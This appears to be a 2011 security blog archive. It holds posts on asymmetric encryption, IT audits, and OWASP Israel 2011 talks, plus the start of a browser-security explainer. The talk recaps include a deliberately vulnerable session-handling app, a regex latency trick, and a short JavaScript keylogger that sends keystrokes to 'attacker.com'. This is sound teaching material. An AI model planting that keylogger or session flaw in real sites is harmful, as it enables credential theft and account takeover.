Archive for September, 2011

QotW #11: Is it possible to have a key for encryption, that cannot be used for decryption?

2011-09-30 by ninefingers. 0 comments

This week’s question of the week was asked by George Bailey, who wanted to know if it were possible to have a key for encryption that could not be used for decryption. This seems at first sight like a simple question, but underneath it there are some cryptographic truths that are interesting to look at.

Firstly, as our first answerer SteveS pointed out, the process of encrypting data according to this model is asymmetric encryption. Steve provided links to several other answers we have. First up from this list was asymmetric vs symmetric encryption. From our answers there, public key cryptography requires two keys: one that can only encrypt material and another that can decrypt it. As several answers observed, compared with straightforward symmetric encryption, the key-pair requirement of public key cryptography creates a large additional burden that depends heavily on careful mathematics, while symmetric key encryption relies chiefly on the confusion and diffusion principles outlined in Shannon’s 1949 Communication Theory of Secrecy Systems. I’ll cover some other points raised in answers later on.

A similarly excellent source of information is what are private and public key cryptography and where are they useful?

So that answered the “is it possible to have such a system” question; the next step is how. This question was asked on the SE network’s Crypto site – how does asymmetric encryption work? In brief, in the most commonly used asymmetric encryption algorithm (RSA), the core element is a trapdoor function or permutation – a process that is relatively trivial to perform in one direction, but difficult (ideally impossible, though we’ll discuss that in a minute) to perform in reverse, except for those who hold some “insider information” – knowledge of the private key being that information. For this to work, the “insider information” must not be guessable from the outside.

This leads directly into interesting territory on our original question. The next linked answer was what is the mathematical model behind the security claims of symmetric ciphers and hash algorithms. Our accepted answer there by D.W. tells you everything you need to know – essentially, there isn’t one. We only believe these functions are secure based on the fact no vulnerability has yet been found.

The problem then becomes: are asymmetric algorithms “secure”? Let’s take RSA as an example. RSA uses a trapdoor permutation: raising values to some exponent (e.g. 3) modulo a big non-prime integer (the modulus). Anybody can do that (well, with a computer at least). However, the reverse operation (extracting a cube root) appears to be very hard, except if you know the factorization of the modulus, in which case it becomes easy (again, using a computer). We have no actual proof that factoring the modulus is required to compute a cube root, but more than 30 years of research have failed to come up with a better way. Nor do we have any actual proof that integer factorization is inherently hard; but that specific problem has been studied for at least 2,500 years, so easy integer factorization is certainly not obvious. Right now, the best known factorization algorithm is the General Number Field Sieve, and its cost becomes prohibitive as the modulus grows (the current world record is for a 768-bit modulus). So it seems that RSA is secure (with a long enough modulus): breaking it would require outsmarting the best mathematicians in the field. Yet it is conceivable that a new mathematical advance may occur any day, leading to an easy (or at least easier) factorization algorithm. The basis for the security claim remains the same: smart people spent time thinking about it, and found no weakness.
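To make the trapdoor idea concrete, here is a toy sketch in Python (textbook RSA with numbers far too small to be secure, purely for illustration):

# Toy RSA: anyone can encrypt with the public values (e, n), but decrypting
# requires d, which is easy to derive only if you know the secret factors p and q.
p, q = 61, 53                # the private factorization of the modulus
n = p * q                    # public modulus (3233)
e = 17                       # public exponent
phi = (p - 1) * (q - 1)      # computable only with the factorization
d = pow(e, -1, phi)          # private exponent (2753), needs Python 3.8+

m = 42                       # a tiny "message"
c = pow(m, e, n)             # encryption: anyone can do this with (e, n)
assert pow(c, d, n) == m     # decryption: easy only with the trapdoor knowledge

With realistically sized moduli (2048 bits and up), deriving d without knowing p and q appears to require factoring n, which is exactly the hard problem described above.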

Cryptography offers very few algorithms with mathematically proven security (e.g. the One-Time Pad), let alone practical algorithms with mathematically proven security; none of them is an asymmetric encryption algorithm. There is no proof that secure asymmetric encryption can really exist. But there is no such proof for hash functions either, and that has never prevented anybody from using hash functions.

Blog promotion aficionado Jeff Ferland provided some extra detail in his answer. Specifically, Jeff addressed which cipher setup should be used for actually encrypting the data, noting that the best setup for most real-world scenarios is the combined use of asymmetric and symmetric cryptography, as occurs in PGP, for example, where a transfer key encrypts the data using symmetric encryption and that key – a much smaller piece of data – can be effectively protected by asymmetric encryption; this is often called “hybrid encryption”. The reason asymmetric encryption is not used throughout, aside from speed, is the padding requirement, as Jeff himself and this question over on Crypto.SE discuss.
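As a rough illustration of that hybrid pattern, here is a minimal Python sketch (using the third-party cryptography package; the library choice and names are mine, not from the answers):

from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes
from cryptography.fernet import Fernet

# Recipient's long-term asymmetric key pair.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

# The bulk data is encrypted under a fresh symmetric key...
session_key = Fernet.generate_key()
ciphertext = Fernet(session_key).encrypt(b"a large message body")

# ...and only the small symmetric key is protected by (slow, padded) RSA.
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
wrapped_key = public_key.encrypt(session_key, oaep)

# The recipient unwraps the symmetric key with the private key, then decrypts.
recovered_key = private_key.decrypt(wrapped_key, oaep)
assert Fernet(recovered_key).decrypt(ciphertext) == b"a large message body"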

So in conclusion, it is definitely possible to have a key that works only for encryption and not for decryption; it requires mathematical structure, and faith in the difficulty of inverting some of these operations. However, using asymmetric encryption correctly and effectively is one of the biggest challenges in the security field; beyond the maths, private key storage, public key distribution, and key usage without leaking confidential information through careless implementation are very difficult to get right.

QotW #10: Carrying Out an IT Audit

2011-09-23 by Jeff Ferland. 0 comments

This week, a newly-minted master’s degree holder asked on our site, “[How do I go about] Carrying out a professional IT audit procedure?” That’s a really big question in one sentence. To break it down into parts we can address, let’s look at the perspectives of the different people involved in an audit.

Staff at an audit client interact with auditors who ask a lot of questions from a script that is usually referred to as a work plan. Many times, they ask you to open the appropriate settings dialogs or configuration files and show them the configuration details they are interested in. Management at an audit client will discuss beforehand which systems are in scope, and the managers for the auditors will select or create appropriate work plans.

The quality, nature, and scope of work plans vary widely, and a single audit will often involve the use of many different plans. Work plans might be written by the audit company or available from regulatory bodies, standards organizations, or software vendors. One example of a readily-available plan is the PCI DSS 2.0 standard. That plan displays both high-level overviews and mid-level configuration requirements across a broad spectrum. Low-level details would be operating system or application specific. Many audit plans related to banking applications have granular detail about core system configuration settings. Also have a look at this question about audit standards for law firms for an example from a different industry showing similarities and differences.

While some plans are regulatory-compliance related, most are best-practices focused. All plans are written with best practices in mind, and for those who are new to the world of IT security, that’s the most challenging part about them. There is no universal standard; many plans greatly overlap, but still differ. If the auditor is appropriately considering their client’s needs, they’ll almost certainly end up marking parts of plans as not applicable or not compliant yet okay because of mitigating circumstances.

Another challenging point for those new to auditing is the sometimes hard-to-grasp separation between objectives and controls. An objective might be to ensure that each user authenticates to their own account. Controls listed in a work plan might include discussion of password expiry requirements to help prevent shared account passwords (among other things). Don’t get crossed up focusing on the control if the objective is met through some other means – perhaps everybody is using biometric authentication instead. There are too many instances of this in the audit world, and it’s a common mistake among newer auditors.

From a good auditor’s perspective, meeting the goals of the work plan might be considered 60% of the job. An auditor’s job isn’t complete unless they’re looking at the whole organization. Some examples: to fulfill a question about password change requirements, the auditor should ask an administrator, see the configuration and ask users about it (“When was the last time the system made you change your password?”). To review a system setting, the auditor should ask to see settings in a general manner, adding detail only as needed: “Can you show me the net effect of policies on this user’s account?” as opposed to “Start->run->rsop.msc”. Users reporting different experiences of password resets than the system configuration shows, or a system administrator who fumbles their way around everything, won’t ever be in the work plan, but they will be a concern.

With that background in mind, here are some general steps to performing an IT audit procedure:

  • Meet with management and determine their needs. You should understand many of the possible accepted risks before you begin the engagement. For example, high-speed traders may stand to lose more money by implementing a firewall than not.
  • Select appropriate audit plans based on available resources and your own relevant work.
  • Properly review the controls with the objectives they meet in mind. Use multiple references when possible, and always try to confirm any settings directly.
  • Pay attention to the big picture. Things should “feel right.”
  • Review your findings with management and consider their thoughts on them. Many times the apparent severity of something needs to be adjusted.
  • At the end of the day, sometimes a business unit may accept the risk from a weak control, despite it looking severe to you as an auditor. That is their prerogative, as long as you have correctly articulated the risks.

The last part of that, auditors reviewing findings with client management, takes the most finesse and unexplainable skill. Does your finding really matter? How can you smooth things over and still deliver over 100 findings? At the end of the day, experience and repetition is the biggest part of delivering professional work, and that’s regardless of the kind of work.

Some further starting points for more detail can be found at http://en.wikipedia.org/wiki/Information_technology_audit_process and http://ithandbook.ffiec.gov/.

OWASP Israel Conference 2011

2011-09-21 by Avi Douglen. 0 comments

This past Thursday, OWASP Israel held their yearly regional conference, just before the larger global AppSec conference in the US. The Interdisciplinary Center Herzliya (IDC) was gracious enough to host the conference.

Sec.se was a sponsor there, and in addition provided some great swag – lanyards for the speakers, stickers, and loads of very cool t-shirts (these were gone before the first lecture even started!) Quite a few attendees popped them straight on, and I heard a lot of compliments on the logo design (thanks @Jin!!). Btw, Sec.se didn’t just sponsor the conference – they’re now full OWASP Members, so kudos to the fellows at StackExchange, Inc.! (Still leaves the issue of which OWASP project to sponsor, please share your opinion there!)

There were quite a few sponsors this year, and that enabled us (disclosure: I am a Board Member of the Israel chapter) to put on the biggest regional conference yet: with approximately 500 attendees – including both security professionals and developers – and parallel tracks totalling 14 talks, it was a definite success.

It was also a great opportunity for networking, as there were people from all sorts of companies there: security product vendors, other software companies, security consulting firms, government/military, academia… very wide and varied.

The only drawback for me was missing half the talks – and running back and forth between the rooms to catch my preferred ones. 🙂

Here’s a quick rundown of the talks I was able to get into; note that most of the presentations are online at https://www.owasp.org/index.php/OWASP_Israel_2011 (and pretty much all of them are actually in English 😉 ).

Opening Words

Ofer Maor, Chapter Chairman, introduced OWASP for those that are new to it: now celebrating 10 years, OWASP is the foremost authority on application security, and provides some great resources to aid developers in creating amazing applications that are also secure. One of the main resources, among the various guides, is the OWASP Top Ten – this is “a broad consensus about what the most critical web application security flaws are.” There are also many open source security projects.

OWASP IL is celebrating its 5th year, and is currently one of the largest chapters… The OWASP IL chapter is also working on translating and updating the OWASP Top 10 into Hebrew (if this is your native language – please give a hand!)

Dr. Anat Bremmler, representing the IDC, spoke about her commitment to security – her background is in network security, and she believes strongly in appsec. This is why this is the 6th OWASP conference to take place at the IDC. On a personal note, I would like to point out that the combination of industry – specifically the security community – and academia is a fantastic situation, and will have some wonderful results. Already, students at the IDC usually offer a presentation on some applicable research arising from their classwork. OWASP has an interest in pushing security education all the way into universities, colleges, and the like.


Keynote: Composite Applications Over Hybrid Clouds – Enterprise Security Challenges of the IT Supply Chain

Dr. Ethan Hadar, SVP of Corporate Technical Strategy at CA, gave a lightweight keynote address, discussing some of the challenges in reconciling the benefits of moving supply chain management to cloud computing with security requirements and needs. While he didn’t really say anything new, he presented the viewpoint of a CIO, who doesn’t really care much about security, except for compliance issues. Contrast this with other perspectives, such as that of a security manager, an auditor, and the end user… Often, it is the perception of security that matters, and not the actual level of security. While we in the security field would often dismiss that as “security theater”, Dr. Hadar made the case that for some stakeholders, this might be what brings the buy-in.

He also brought up an interesting issue, regarding testing “composite applications” (i.e. systems that comprise 3rd party services) or apps hosted on “cloud infrastructure”: how can you test the sub-services? What if these are hosted on IaaS/PaaS/ *aaS etc? Are you even allowed to? In what country? What if your meta-system relies on 3rd party service? What can you do about change management – on the subsystems?

And whose responsibility is it, anyway? Dr. Hadar suggested including security in the contractual SLA…

But then, there are also short-lived apps – what he calls “situational applications”, such as when a department pops up a website for a short timeframe.

Overall, not really anything new – but it was more about presenting the questions, providing food for thought…

The CIO doesn’t want security; it’s like talking to an insurance agent – just something you have to do – so we should be making it as painless as possible.


Temporal Session Race Conditions

Shay Chen, CTO of Ernst and Young’s Hacktics Advanced Security Center, demoed a new class of attack he’s calling “Temporal Session Race Condition”.

Shay attempted to login to a simple webapp, without a valid password. He overloaded the password field with too much data, causing a momentary delay… In the meantime, he opened another window and tried to jump directly to an internal page. This created a sort of race condition on the session management…

Typically, race conditions imply some form of latency that causes the intended order of operations to change, or become unpredictable. In this case, even where no latency exists, the attacker creates the latency as needed, in order to force the race condition.

The success of this attack can be based on what Shay calls “Session Puzzling”. This attack is kinda complex, but in certain scenarios can allow the attacker to subvert the session generation. For example, a webserver will generate a new session id, associate the session id with the memory area, and then store the session id. Of course, this session id is sent to the user’s browser (typically via a cookie, using a Set-Cookie header), which is then reused to find the session memory.

In a Session Puzzle attack, the web app accidentally stores a special flag in the session memory – e.g. in a multi-phase password recovery process. This flag might be (and often is) the same flag that is checked by the rest of the application to verify that the user is logged in (for example, a session variable called, surprisingly, “username”).

While this is a relatively simplistic scenario (note that while it shouldn’t happen, it often does, sadly enough) – the more general case, of multi-phase flow control stored in session variables, is quite common. If the session variables used to store the flow control are the same variables used elsewhere, this can be subverted by running two flows in parallel, without advancing the flow in the expected order (i.e. stop flow A after the first step, then commence flow B and continue through till the end). Likewise, it can be possible in some cases to skip steps in the flow, and jump ahead to a more interesting step – such as the phase where the password can be retrieved.
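A minimal sketch of the kind of flaw Shay described (Flask-style Python of my own invention, not his demo code):

# Hypothetical vulnerable app: the password-recovery flow and the login check
# both key off session["username"], so merely starting recovery "logs you in".
from flask import Flask, session, request, redirect

app = Flask(__name__)
app.secret_key = "demo-only"

@app.route("/recover/start", methods=["POST"])
def recover_start():
    # Step 1 of password recovery: remember whose password is being recovered.
    session["username"] = request.form["username"]      # flag set far too early
    return redirect("/recover/question")

@app.route("/account")
def account():
    # The login check elsewhere in the app uses the very same session variable.
    if "username" not in session:
        return "please log in", 401
    return "secret account page for " + session["username"]

# Attack: POST to /recover/start with username=victim, then browse straight to
# /account without ever answering the security question or knowing the password.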

Shay then went on to discuss techniques to control what he calls “productive latency” – i.e. controlling how much time a specific line of code should take. This will increase the window of opportunity to inject a specific RC, even in cases where (flow-based) Session Puzzling does not apply. For example, what if the logon mechanism stores the username in the session, before verifying the password – and if the password is incorrect, the session is invalidated (in the same function)? This is not a multi-step flow, however by injecting the productive latency, it will be possible to create a race condition (by jumping to an internal page, during the authentication attempt).

These “productive latency” inducing techniques include regexes, loops, complex queries, and database connection pool exhaustion. He also introduced a tool (and who doesn’t love tools?) to flood a data access web page and forcefully occupy the entire connection pool for a given amount of time…
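As a tiny illustration of input-controlled latency (my own example, not Shay’s tooling), a catastrophically backtracking regex lets an attacker dial in how long a single line of code takes:

import re, time

pattern = re.compile(r"^(a+)+$")      # nested quantifiers: exponential backtracking

for n in (18, 21, 24):
    payload = "a" * n + "b"           # the trailing "b" forces the engine to backtrack
    start = time.time()
    pattern.match(payload)
    print(n, "chars ->", round(time.time() - start, 3), "seconds")

Each extra character roughly doubles the matching time, so a few bytes more or less in the payload gives fairly fine control over the delay.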

Btw, he also mentioned an architecture of two separate systems that share a backend resource – one app might be able to saturate the backend connections, thus creating latency for the other app.

At the very end, as a sort of appendix, he did discuss ways to detect such vulnerabilities – both in blackbox pentests and in code reviews. It really just comes back to finding places where an application-layer DoS is possible for any of the backend layers – such as a resource or code flow that is controlled by input (direct or indirect).


Building an Effective SDLC Program

This was a joint lecture between Ofer Maor (CTO of Seeker Security, formerly CTO of E&Y’s Hacktics, and also the chapter chairman) and Guy Bejerano, CSO of Liveperson. The two presented a case study of the process of implementing an SDL – security development lifecycle. They discussed their mutual experience of pulling the Liveperson development staff into SDL (Ofer’s team consulted for Liveperson on this).

One of the key challenges for Liveperson (and indeed, most SaaS providers) is providing a service – which should be secure, of course – in the cloud, and using cloud services. (This calls back to some of the challenges that Dr. Hadar referred to in his keynote). Amongst other issues, many of their high-security customers insisted on performing an external pentest on their service. On the other hand, Liveperson felt the impact of security bugs – friction, costs, reputation damage – but did not really bother to focus on the upside.

Their development started as a standard “Waterfall” process (Gladly, they didn’t eat the lunch of my own later talk, though there is some overlap…) This did present its own challenges, such as accuracy and repetitiveness of testing, and more.

They then decided to switch to an Agile lifecycle, but this created even more friction! (My talk later in the day focused on the difficulties of SDL specifically with Agile.) Ofer shared an anecdote regarding SDL-related friction: he performed a pentest for one of the larger US retailers. Having found many instances of SQL injection and over 40 other vulnerabilities, he was later told that the developers had to work overnight straight through the holiday season, just to fix what was only discovered at the end of the cycle instead of much earlier.

Guy perceives “SDLC” as “vendor heaven” – with an overload of products, services, and more, you never know what you need, or when it’s enough, right?

They proposed a few key points to focus on, before laying out your SDL:

  • Define your requirements – focus on risk profile, including your customers’ risk requirements (e.g. PCI, HIPAA, etc.). Decide where you need to get to.
  • Select a framework – for a common language; e.g. Liveperson settled on OWASP’s taxonomy.
  • Who leads the program? For a very technical org (such as any software company), it can no longer be just the CSO, but you have to create ownership in the dev teams.

For example, the system owner needs to accept security as one of the operational requirements… and it then becomes his responsibility to deliver. Also, it’s best if you can make security leaders (or “champions”) out of the best programmers.

Security then becomes part of the quality requirement. It can start with QA, by getting them interested / involved in security – then QA can find security bugs, too.

  • Knowledge sharing: there were some changes in the process from what they originally intended. They started off with a mistake, but then realized that they must create awareness. It even came to the point that watercooler talk between programmers was actually about SQL injection.
  • Penetration testing strategy (manual/automatic, blackbox/whitebox, internal/external, etc)
  • Fitting tools to platform/process
  • Operational cycle – Key Performance Indicators (for the SDL), and reviewed by owners

Encouragingly, Guy affirmed that a second round of SDL implementation, with focus on these issues, was a lot more successful.


Glass Box Testing – Thinking Inside the Box

Omri Weisman, manager of the Security Research Group in IBM, gave an interesting talk about their research in new forms of automated testing. (Of course, count on IBM that this will eventually be rolled into a high-end product. Btw, one of the other sponsors of the conference, Seeker Security, also has a product in this field, though I have not personally experimented with it yet).

Previously, one of the main options for automated testing was Black Box – based on sending inputs to a closed system and checking the outputs. One key drawback of this approach is the difficulty in finding hidden logic – such as magic numbers, secret parameters, and the like. Another challenge for black box testing is attacks that don’t really have noticeable results – as an example, consider SQL Injection that does not return data. While there are ways around this, such as blind injection or timing attacks, this is often complex and not trivial.

Another important drawback to blackbox testing is that it is typically very difficult to trace a given issue back to the line of code that needs to be fixed. Often a programmer, tasked with fixing a vulnerability found in BB, will have to drill down through many layers of code – calling functions, configured classes, referenced modules, and pointless comments – until he finds the one single faulty line of code.

So what is GlassBox?

Omri used a very cute video to display this intuitively… Blackbox: sliding an envelope under a closed door, and getting another envelope in response. Glassbox is like sliding the envelope under the door – and then looking through the window, to see a gorilla preparing the response…. 🙂

Or, more succinctly:

Glass Box testing uses internal agents to guide application scanning

Using this direction, GB has a lot more information available – memory, structure, environment, source code, runtime configuration, actual network traffic, access to file-system, registry, database, and much more.

Glassbox offers the capability to do additional tests that you couldn’t do with straight BB – such as verifying test coverage (an important facet in security assurance), finding hidden parameters and values, backdoors, attacks with no response, DoS, and even generating exploits directly according to the existing input validation.

GB further assists the testing process by consolidating and correlating similar issues that can be traced back to the same source, thus removing duplicates. GB can also trace the results of the external pentest back to the specific lines of code, and can also help remove false positives.

Thus, Glassbox testing could solve the black box challenges… and moreover, this would enable an automated PT tool to automatically detect e.g. all OWASP Top 10 issues (typically, BB tools can only discover half).


Agile + SDL – Concepts and Misconceptions

Next up was my own talk, together with Nir Bregman from HP, explaining the difficulty in combining an SDL (Security Development Lifecycle) process with Agile methodology – but I will save the content of that for its own post, where I’ll elaborate on the whole idea behind the talk.

Without delving into the content, I will say that I had a blast delivering the talk. After a short introduction to the terminology (for those unfamiliar), we structured the first half of the talk as an aggressive back-and-forth (modeled after the “yo’ momma” contests of yore), with each of us presenting an ignorant view of the other’s methodology (I defended SDL, as a security pro, and showed great ignorance and pettiness wrt Agile; Nir respectfully displayed immaturity regarding all things security). The second half of the talk, of course, showed how to reconcile the resulting problems, and presented some possibilities for implementing SDL as part of an Agile workflow.

Before that, though, we had a great lunch – thanks to all the sponsors!


When Crypto Goes Wrong

Erez Metula (AppSec Labs) is well-known as a great speaker, and he always puts on a great show. This time, he did not disappoint. Though there was not much new meat in his talk, it was a great back-to-basics review of common mistakes that happen when programmers try to implement cryptographic functions. (Overall, I think this was probably the most important talk of the day, at least for the programmers that attended – and at the end of the day, isn’t the whole purpose of OWASP to help programmers implement secure code?).

  • Home grown algorithms
  • Outdated crypto (e.g. MD5, DES)
  • Bad encryption mode, e.g. AES with ECB instead of CBC (a quick demonstration follows this list).
  • Forgetting to verify certificates – e.g. from a rich client, when calling a backend web service, or even more commonly from mobile apps.
  • Not requiring HTTPS (Don’t forget about SSLstrip…)
  • Direct access to server-side crypto functions
  • Direct access to client-side crypto functions (ex: exposed ActiveX crypto)
  • Sending hash values over an insecure transport (such as this recent question)
  • Not using salts (and pepper)
  • Leaving the key with the encrypted secrets
  • Unprotected encryption keys
  • Same symmetric key for all clients
  • Same asymmetric keys for all deployments
  • Same keys, different encryption needs (or “Crypto is not a replacement for access control”)
  • Replaying password hashes
  • Replaying encrypted blocks
  • Combining (or correlating) unrelated encrypted blocks
  • Crypto-DoS – by causing the application to RSA sign large amounts of data
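To pick one item off that list, the ECB pitfall is easy to demonstrate for yourself – a minimal Python sketch (using the third-party cryptography package; the key and data are made up):

import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = os.urandom(16)
plaintext = b"ATTACK AT DAWN!!" * 2          # two identical 16-byte blocks

def encrypt(mode):
    enc = Cipher(algorithms.AES(key), mode).encryptor()
    return enc.update(plaintext) + enc.finalize()

ecb = encrypt(modes.ECB())
cbc = encrypt(modes.CBC(os.urandom(16)))

# ECB maps equal plaintext blocks to equal ciphertext blocks, leaking structure.
print(ecb[:16] == ecb[16:32])    # True  - the repetition is visible
print(cbc[:16] == cbc[16:32])    # False - CBC chains blocks, hiding it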


Hey, What’s your App doing on my (Smart)Phone?

Shay Zalalichin, CTO of Comsec Consulting (and btw, my former boss 🙂 ), discussed various mobile malware, focusing specifically on the Android platform. Just a note, this was the second out of three talks about mobile security (I missed Itzik Kotler’s talk on hacking mobile apps, but I heard it was great – he also presented results of research that Security Art performed on the most common apps in the iTunes store). This can be taken as a sign of OWASP’s acceptance in a wider role in Application Security, and no longer just Web Apps.

As an example, Shay displayed an Android app (from the Android Market), that simply displays a diamond – if you can’t afford a real diamond, you can’t afford this – but, secretly, the app accesses all the phone logs, outgoing calls, contacts, etc.

His message focused on the fact that today’s phones have a lot more functionality, connectivity – and assets. It’s a stretch to even call it a “phone”… Depending on your viewpoint, phones can provide something computers don’t have (user viewpoint); but they are also really pretty much a mobile computer, with access to the same assets as a regular computer (enterprise management viewpoint).

Whilst the mobile market is finally evolving (“year of the mobile” has been declared several years in a row, but now the stats actually back it up), mobile malware is also evolving. State-of-the-art mobile malware no longer focuses just on “sending premium SMS”, now malware is also actually attacking the mobile device, stored assets, and more. Btw, it is trivial getting malware into the Android market…

Shay explained the Android architecture, its security model (based on pieces from both Linux and Java), and Android permissions, which are based on a thick manifest – and are very much not fine-grained (e.g. an app can be granted “access internet”, but there is no way to limit that to a single site, and the Same Origin Policy does not apply). Shay also discussed some of the key components of the platform, such as “intents” – basically an IPC mechanism (for intra- and inter-app communication).

Some Android specific attacks: intent sniffing, intent spoofing / injection, insecure storage, privilege manipulation and bypass, and more.

Btw, as he mentioned, OWASP has its own mobile security project. Anyway, I don’t think that I will be getting an Android phone anytime soon… 😉


The Bank Job II

The final talk of the day came from Adi Sharabani, leader of Rational’s Security Strategy and Architecture team at IBM, who ran a very nice demo of a hacker’s (sic) experience.

1. Know your target

  • Same Origin Policy (SOP), enforced by all common web browsers, prevents a page on a website from directly accessing any other website.
  • There are some ways to overcome SOP:
    • Site vulnerabilities: client side vulnerabilities, Man-in-the-Middle (MitM) – especially over unprotected Wi-Fi
    • Browser vulnerabilities, DNS vulnerabilities, Active MitM

2. Executing the Attack

1. open URL

2. sleep

3. open `javascript:alert(1)`

But what else can this vulnerability be used for? E.g. stealing a user’s session id for some random other site (after login).

E.g. using an external JavaScript file to request an image on the attacker’s server with the session id in the URL – of course, the image itself is of no interest; however, the attacker has already received the user’s session id.

  • Some challenges with the above attack scenario:
    • The victim is not yet authenticated, so stealing the session id would be pointless
    • This would be blocked by the HttpOnly cookie attribute.
  • Adi presented a JavaScript based keylogger (in only a handful of lines of code!):

function sendData(c) {
    var img = document.createElement("img");
    img.src = "http://attacker.com/" + c;            // leak the keystroke in the request URL
    document.body.appendChild(img);
}

document.body.onkeypress = function (event) {
    sendData(String.fromCharCode(event.which || event.keyCode));
};

(Hmm, as I am an IntelliSense cripple, please forgive my memory if there are any syntax errors…)

  • 2-factor authentication would still prevent this attack…
    • Instead, the attacker can embed the attack directly in the client JavaScript, and have no need to steal the session id itself. (Btw, in many cases, the 2-factor authentication is only applied on the authentication page – but further session access would be based on the session id alone…)
  • Based on the above vulnerability + keylogger, a malicious app could easily permanently poison any browser session running on the device! (Adi also showed a workaround for unload events, e.g. if the user closes the browser you don’t want to keep poisoning the session.)

Boom, there you have it – the attacker is now in total control of all browsing you do from your mobile phone…

What an encouraging note to end the day 😀

An accessible overview of browser security

2011-09-20 by ninefingers. 2 comments

The purpose of this post is to introduce you, an IT-aware but perhaps not software-engineering person, to the various issues surrounding browser security. In order to do this I’ll go quickly through some theory you need to know first; there is some simple C-like pseudocode and the odd bad joke, but otherwise this isn’t too technical a post, and you should be able to read it without having to dive into 50 or so books or google every other word. At least, that’s the idea.

What is a browser?

Before we answer that we really need a crash course on kernel internals. It’s not rocket science though; it’s actually very simple. An application on your system runs and is called a process. Each process, for most systems you’re likely to be running, has its own address space, which is where everything it keeps in memory lives. A process has some code, and the operating system (kernel) gives it a set amount of time to run before giving another process some time. How to do that so everything keeps going really would be a technical blog post in itself, so we’ll just skip it. Suffice to say, it’s being constantly improved.

Of course, sometimes you might want to get more than one thing done at once, which is where threads come in. How threads are implemented differs across OSes – on Windows, each process contains a single, initial thread, and if you want to do more things you can add threads to the process. On Linux, threads and processes are essentially the same, except that threads share memory. That is the really important common idea behind a thread, and it is also true of Windows – threads share memory, processes do not.
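If it helps to see that difference concretely, here is a minimal Python sketch (my own illustration, not from the original post) showing that threads touch the same variable while child processes only touch their own copies:

import threading
import multiprocessing

counter = 0

def bump():
    global counter
    counter += 1

def main():
    global counter

    # Threads share their parent's memory: both increments hit the same variable.
    threads = [threading.Thread(target=bump) for _ in range(2)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    print("counter after threads:", counter)    # 2

    # Processes each get their own copy of the address space: the children
    # increment their private copies, and the parent's counter is untouched.
    counter = 0
    procs = [multiprocessing.Process(target=bump) for _ in range(2)]
    for p in procs:
        p.start()
    for p in procs:
        p.join()
    print("counter after processes:", counter)  # still 0 in the parent

if __name__ == "__main__":
    main()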

How does my process get stuff done then?

So now we’ve got that out the way, how does your program get stuff done? Well, you can do one of these three things:

  1. If you can do it yourself, as a program, you just do it.
  2. If another library can do it, you might use that.
  3. Or alternatively, you might ask the operating system to do it.

In reality, what might happen is your program asks a library to do it which then asks the operating system to do it. That’s exactly how the C standard library works, for example. The end result, however, and the one we care about, is whether you end up asking the operating system. So you get this:

Operating system <-- Program

Later on, I’ll make the program side of things slightly more complicated, but let’s move on.

How do we do plugins generically?

Firstly, a word on “shared objects”. Windows calls these dynamic link libraries and they’re very powerful, but all we’re concerned with here really is how they end up working. On the simplest possible level, you might have a function like this:

void parse_html(char* input)
{
    call_to_os();
    do_something_with(input);
}

A shared library might implement a function like this:

void decode_and_play_swf(char* data)
{
    call_to_os();
    do_some_decoding_and_playing_of(data);
}

When a shared object loads with your code, the result, in your program’s memory, is this:

void decode_and_play_swf(char* data)
{
    call_to_os();
    do_some_decoding_and_playing_of(data);
}

void parse_html(char* input)
{
    call_to_os();
    do_something_with(input);
}

Told you it was straightforward. Now, making a plugin work is a little more complicated than that. The program code needs to be able to load the shared object, and it must expect a standard set of functions to be present. For example, a browser might expect a function like this in a plugin:

int plugin_iscompatible(int version)
{
    /* compatible only if the host's version falls inside the supported range */
    if ( version >= min_required_version && version <= max_supported_version )
    {
        return 0;
    }
    else
    {
        return -1;
    }
}

Similarly, the app we’re plugging into might offer certain functions that a plugin can call to do things. An example of this would be exactly a browser plugin for drawing custom content to a page – the browser needs to provide the plugin the functionality to do that.

So can all this code do what it likes then?

Well that depends. Basically, when you do this:

Operating system <-- Program

the operating system doesn’t just do whatever you asked for. In most modern OSes, that program is also run in the context of a given user. So that program can do exactly what the user can do.

I should also point out that, for the purposes of loading shared libraries, they appear to most reporting tools as the program they’re loaded into. After all, they are literally loaded into that program. So when the plugin is doing something, it does it on behalf of the program.

I should also point out that when you load the plugin, it literally gets joined to the memory space of the program. Yes, this is an attack vector called DLL injection; yes, you can do bad things with it, but it is highly useful too.

I read this blog post to know about browsers! What’s all this?

One last point to make. Clearly, browsers run on lots of different platforms. Browsers have to be compiled on each platform, but forcing plugin writers to do that is a bit hostile really. It means many decent plugins might not get written, so browser makers came up with a solution: embed a programming language.

That sounds a lot crazier than it is. Technically, you already have one quite complicated parser in the browser; you’ve got to support this weird HTML thing (without using regex) – and CSS, and Javascript… wait a minute, given we’ve stuck a programming language parser for javascript into the browser, why don’t we extend that to support plugins?

This is exactly what Mozilla did. See their introductory guide (and as a side note on how good Stack Overflow really is, here’s a Mozilla developer on SO pointing someone to the docs). Actually in truth it’s a little bit more complicated than I made out. Since Firefox already includes an XML/XHTML/HTML parser, the developers went all out – a lot of the user interface can be extended using XUL, an XML variant for that purpose. Technically, you could write an entire user interface in it.

Just as a quick recap, in order for your XML, XHTML, HTML, Javascript, CSS to get things done, it has to do this:

Operating system <-- Browser <-- Javascript or something

So, now the browser makes decisions based on what the Javascript asks before it asks the operating system. This has some security implications, which we’ll get to in exactly one more diagram’s time. It’s worth noting that on a broad concept level, languages like Python and Java also work this way:

Operating system <-- Interpreter/JVM etc <-- Script/Java Bytecode

Browsers! Focus, please!

Ok, ok. All of that was to enable you to understand the various levels on which a browser can be attacked – you need to understand the difference in locations and the various concepts for this explanation to work, so hopefully we’re there. So let’s get to it.

So, basically, security issues arise for the most part (ignoring some more complicated ones for now) because of bad input. Bad input gets into a program and hopefully crashes it, because the alternative is that specially crafted input makes it do something it shouldn’t and that’s pretty much always a lot worse. So the real aim of the game is evaluating how bad bad input really is. The browser accepts a lot of input on varying levels, so let’s take them turn by turn:

